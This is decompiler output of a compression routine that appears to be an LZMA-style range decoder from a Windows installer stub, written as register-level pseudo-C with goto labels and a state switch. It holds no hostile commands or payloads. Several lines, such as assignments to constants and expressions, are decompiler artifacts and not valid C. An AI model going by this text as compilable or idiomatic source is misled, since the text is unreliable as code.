                                                                                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 8);
                                                                                                                          							__ebx = 0;
                                                                                                                          							__ebx = 1;
                                                                                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							L40:
                                                                                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          							 *(__ebp - 0x48) = __eax;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__eax = __eax << 8;
                                                                                                                          							__eax = __eax + __ebx;
                                                                                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edx = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								 *(__ebp - 0x40) = 1;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__ebx = __ebx + __ebx + 1;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edx;
                                                                                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								L38:
                                                                                                                          								__eax =  *(__ebp - 0x40);
                                                                                                                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          									while(1) {
                                                                                                                          										if(__ebx >= 0x100) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										__eax =  *(__ebp - 0x58);
                                                                                                                          										__edx = __ebx + __ebx;
                                                                                                                          										__ecx =  *(__ebp - 0x10);
                                                                                                                          										__esi = __edx + __eax;
                                                                                                                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          										__ax =  *__esi;
                                                                                                                          										 *(__ebp - 0x54) = __esi;
                                                                                                                          										__edi = __ax & 0x0000ffff;
                                                                                                                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											__cx = __ax;
                                                                                                                          											_t169 = __edx + 1; // 0x1
                                                                                                                          											__ebx = _t169;
                                                                                                                          											__cx = __ax >> 5;
                                                                                                                          											 *__esi = __ax;
                                                                                                                          										} else {
                                                                                                                          											 *(__ebp - 0x10) = __ecx;
                                                                                                                          											0x800 = 0x800 - __edi;
                                                                                                                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          											__ebx = __ebx + __ebx;
                                                                                                                          											 *__esi = __cx;
                                                                                                                          										}
                                                                                                                          										 *(__ebp - 0x44) = __ebx;
                                                                                                                          										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                          											L45:
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t155 = __ebp - 0x70;
                                                                                                                          											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									L53:
                                                                                                                          									_t172 = __ebp - 0x34;
                                                                                                                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          									L54:
                                                                                                                          									__al =  *(__ebp - 0x44);
                                                                                                                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          									L55:
                                                                                                                          									if( *(__ebp - 0x64) == 0) {
                                                                                                                          										 *(__ebp - 0x88) = 0x1a;
                                                                                                                          										goto L170;
                                                                                                                          									}
                                                                                                                          									__ecx =  *(__ebp - 0x68);
                                                                                                                          									__al =  *(__ebp - 0x5c);
                                                                                                                          									__edx =  *(__ebp - 8);
                                                                                                                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          									 *( *(__ebp - 0x68)) = __al;
                                                                                                                          									__ecx =  *(__ebp - 0x14);
                                                                                                                          									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          									__eax = __ecx + 1;
                                                                                                                          									__edx = 0;
                                                                                                                          									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                          									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          									__edx = _t191;
                                                                                                                          									L79:
                                                                                                                          									 *(__ebp - 0x14) = __edx;
                                                                                                                          									L80:
                                                                                                                          									 *(__ebp - 0x88) = 2;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									goto L53;
                                                                                                                          								}
                                                                                                                          								goto L40;
                                                                                                                          							} else {
                                                                                                                          								L36:
                                                                                                                          								if( *(__ebp - 0x6c) == 0) {
                                                                                                                          									 *(__ebp - 0x88) = 0xd;
                                                                                                                          									L170:
                                                                                                                          									_t568 = 0x22;
                                                                                                                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                          									_t535 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t535;
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0x70);
                                                                                                                          								__eax =  *(__ebp - 0xc);
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								_t121 = __ebp - 0x70;
                                                                                                                          								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          								goto L38;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L1:
                                                                                                                          					_t534 =  *(_t614 - 0x88);
                                                                                                                          					if(_t534 > 0x1c) {
                                                                                                                          						L171:
                                                                                                                          						_t535 = _t534 | 0xffffffff;
                                                                                                                          						goto L172;
                                                                                                                          					}
                                                                                                                          					switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                          						case 0:
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							_t534 =  *( *(_t614 - 0x70));
                                                                                                                          							if(_t534 > 0xe1) {
                                                                                                                          								goto L171;
                                                                                                                          							}
                                                                                                                          							_t538 = _t534 & 0x000000ff;
                                                                                                                          							_push(0x2d);
                                                                                                                          							asm("cdq");
                                                                                                                          							_pop(_t570);
                                                                                                                          							_push(9);
                                                                                                                          							_pop(_t571);
                                                                                                                          							_t610 = _t538 / _t570;
                                                                                                                          							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                          							asm("cdq");
                                                                                                                          							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                          							 *(_t614 - 0x3c) = _t605;
                                                                                                                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                          								L10:
                                                                                                                          								if(_t613 == 0) {
                                                                                                                          									L12:
                                                                                                                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									goto L11;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L11:
                                                                                                                          									_t613 = _t613 - 1;
                                                                                                                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                          								} while (_t613 != 0);
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          							if( *(_t614 - 4) != 0) {
                                                                                                                          								GlobalFree( *(_t614 - 4));
                                                                                                                          							}
                                                                                                                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          							 *(_t614 - 4) = _t534;
                                                                                                                          							if(_t534 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                          								goto L10;
                                                                                                                          							}
                                                                                                                          						case 1:
                                                                                                                          							L13:
                                                                                                                          							__eflags =  *(_t614 - 0x6c);
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								 *(_t614 - 0x88) = 1;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							_t45 = _t614 - 0x48;
                                                                                                                          							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                          							__eflags =  *_t45;
                                                                                                                          							L15:
                                                                                                                          							if( *(_t614 - 0x48) < 4) {
                                                                                                                          								goto L13;
                                                                                                                          							}
                                                                                                                          							_t546 =  *(_t614 - 0x40);
                                                                                                                          							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                          								L20:
                                                                                                                          								 *(_t614 - 0x48) = 5;
                                                                                                                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x74) = _t546;
                                                                                                                          							if( *(_t614 - 8) != 0) {
                                                                                                                          								GlobalFree( *(_t614 - 8)); // executed
                                                                                                                          							}
                                                                                                                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                          							 *(_t614 - 8) = _t534;
                                                                                                                          							if(_t534 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          						case 2:
                                                                                                                          							L24:
                                                                                                                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                          							 *(_t614 - 0x84) = 6;
                                                                                                                          							 *(_t614 - 0x4c) = _t553;
                                                                                                                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 3:
                                                                                                                          							L21:
                                                                                                                          							__eflags =  *(_t614 - 0x6c);
                                                                                                                          							if( *(_t614 - 0x6c) == 0) {
                                                                                                                          								 *(_t614 - 0x88) = 3;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                          							_t67 = _t614 - 0x70;
                                                                                                                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                          							__eflags =  *_t67;
                                                                                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                          							L23:
                                                                                                                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                          							if( *(_t614 - 0x48) != 0) {
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          							goto L24;
                                                                                                                          						case 4:
                                                                                                                          							goto L133;
                                                                                                                          						case 5:
                                                                                                                          							goto L137;
                                                                                                                          						case 6:
                                                                                                                          							goto L0;
                                                                                                                          						case 7:
                                                                                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          							if( *(__ebp - 0x40) != 1) {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          								 *(__ebp - 0x80) = 0x16;
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x28);
                                                                                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          								__eax = 0;
                                                                                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          								__al = __al & 0x000000fd;
                                                                                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *(__ebp - 0x58) = __eax;
                                                                                                                          								goto L68;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 4);
                                                                                                                          							__ecx =  *(__ebp - 0x38);
                                                                                                                          							 *(__ebp - 0x84) = 8;
                                                                                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 8:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xa;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x38);
                                                                                                                          								__ecx =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          								 *(__ebp - 0x84) = 9;
                                                                                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          							}
                                                                                                                          							goto L132;
                                                                                                                          						case 9:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								goto L89;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x60);
                                                                                                                          							if( *(__ebp - 0x60) == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							}
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          							__eflags = _t258;
                                                                                                                          							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          							goto L75;
                                                                                                                          						case 0xa:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xb;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x28);
                                                                                                                          							goto L88;
                                                                                                                          						case 0xb:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x20);
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x28);
                                                                                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          							L88:
                                                                                                                          							__ecx =  *(__ebp - 0x2c);
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          							L89:
                                                                                                                          							__eax =  *(__ebp - 4);
                                                                                                                          							 *(__ebp - 0x80) = 0x15;
                                                                                                                          							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          							goto L68;
                                                                                                                          						case 0xc:
                                                                                                                          							L99:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xc;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t334 = __ebp - 0x70;
                                                                                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t334;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							__eax =  *(__ebp - 0x2c);
                                                                                                                          							goto L101;
                                                                                                                          						case 0xd:
                                                                                                                          							goto L36;
                                                                                                                          						case 0xe:
                                                                                                                          							goto L45;
                                                                                                                          						case 0xf:
                                                                                                                          							goto L57;
                                                                                                                          						case 0x10:
                                                                                                                          							L109:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x10;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t365 = __ebp - 0x70;
                                                                                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t365;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							goto L111;
                                                                                                                          						case 0x11:
                                                                                                                          							L68:
                                                                                                                          							__esi =  *(__ebp - 0x58);
                                                                                                                          							 *(__ebp - 0x84) = 0x12;
                                                                                                                          							goto L132;
                                                                                                                          						case 0x12:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 0x58);
                                                                                                                          								 *(__ebp - 0x84) = 0x13;
                                                                                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x4c);
                                                                                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          							__eflags = __eax;
                                                                                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          							goto L130;
                                                                                                                          						case 0x13:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								_t469 = __ebp - 0x58;
                                                                                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          								__eflags =  *_t469;
                                                                                                                          								 *(__ebp - 0x30) = 0x10;
                                                                                                                          								 *(__ebp - 0x40) = 8;
                                                                                                                          								L144:
                                                                                                                          								 *(__ebp - 0x7c) = 0x14;
                                                                                                                          								goto L145;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x4c);
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          							 *(__ebp - 0x30) = 8;
                                                                                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          							L130:
                                                                                                                          							 *(__ebp - 0x58) = __eax;
                                                                                                                          							 *(__ebp - 0x40) = 3;
                                                                                                                          							goto L144;
                                                                                                                          						case 0x14:
                                                                                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          							__eax =  *(__ebp - 0x80);
                                                                                                                          							goto L140;
                                                                                                                          						case 0x15:
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          							__al = __al & 0x000000fd;
                                                                                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							goto L120;
                                                                                                                          						case 0x16:
                                                                                                                          							__eax =  *(__ebp - 0x30);
                                                                                                                          							__eflags = __eax - 4;
                                                                                                                          							if(__eax >= 4) {
                                                                                                                          								_push(3);
                                                                                                                          								_pop(__eax);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 4);
                                                                                                                          							 *(__ebp - 0x40) = 6;
                                                                                                                          							__eax = __eax << 7;
                                                                                                                          							 *(__ebp - 0x7c) = 0x19;
                                                                                                                          							 *(__ebp - 0x58) = __eax;
                                                                                                                          							goto L145;
                                                                                                                          						case 0x17:
                                                                                                                          							L145:
                                                                                                                          							__eax =  *(__ebp - 0x40);
                                                                                                                          							 *(__ebp - 0x50) = 1;
                                                                                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          							goto L149;
                                                                                                                          						case 0x18:
                                                                                                                          							L146:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x18;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t484 = __ebp - 0x70;
                                                                                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t484;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L148:
                                                                                                                          							_t487 = __ebp - 0x48;
                                                                                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          							__eflags =  *_t487;
                                                                                                                          							L149:
                                                                                                                          							__eflags =  *(__ebp - 0x48);
                                                                                                                          							if( *(__ebp - 0x48) <= 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x40);
                                                                                                                          								__ebx =  *(__ebp - 0x50);
                                                                                                                          								0 = 1;
                                                                                                                          								__eax = 1 << __cl;
                                                                                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          								__eax =  *(__ebp - 0x7c);
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								goto L140;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x50);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eax = __eax - __ecx;
                                                                                                                          								__edx = __edx + 1;
                                                                                                                          								__eflags = __edx;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          								 *(__ebp - 0x50) = __edx;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L148;
                                                                                                                          							} else {
                                                                                                                          								goto L146;
                                                                                                                          							}
                                                                                                                          						case 0x19:
                                                                                                                          							__eflags = __ebx - 4;
                                                                                                                          							if(__ebx < 4) {
                                                                                                                          								 *(__ebp - 0x2c) = __ebx;
                                                                                                                          								L119:
                                                                                                                          								_t393 = __ebp - 0x2c;
                                                                                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          								__eflags =  *_t393;
                                                                                                                          								L120:
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax;
                                                                                                                          								if(__eax == 0) {
                                                                                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          									goto L170;
                                                                                                                          								}
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          									goto L171;
                                                                                                                          								}
                                                                                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          								__eax =  *(__ebp - 0x30);
                                                                                                                          								_t400 = __ebp - 0x60;
                                                                                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          								__eflags =  *_t400;
                                                                                                                          								goto L123;
                                                                                                                          							}
                                                                                                                          							__ecx = __ebx;
                                                                                                                          							__eax = __ebx;
